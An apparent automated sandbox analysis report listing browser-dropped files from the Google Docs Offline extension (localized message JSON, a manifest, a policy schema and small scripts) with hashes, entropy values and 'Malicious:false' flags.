                                                                                                                                                                  Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):934
                                                                                                                                                                  Entropy (8bit):4.882122893545996
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                  Entropy (8bit):4.6041913416245
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1320
                                                                                                                                                                  Entropy (8bit):4.569671329405572
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):884
                                                                                                                                                                  Entropy (8bit):4.627108704340797
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):980
                                                                                                                                                                  Entropy (8bit):4.50673686618174
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                  Entropy (8bit):4.132139619026436
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1969
                                                                                                                                                                  Entropy (8bit):4.327258153043599
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1674
                                                                                                                                                                  Entropy (8bit):4.343724179386811
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):11406
                                                                                                                                                                  Entropy (8bit):5.745845607168024
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                  MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                  SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                  SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                  SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                  Entropy (8bit):5.417954053901
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                  MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                  SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                  SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                  SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):122218
                                                                                                                                                                  Entropy (8bit):5.439997574414675
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                  MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                  SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                  SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                  SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):130866
                                                                                                                                                                  Entropy (8bit):5.425065147784983
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                  MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                  SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                  SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                  SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
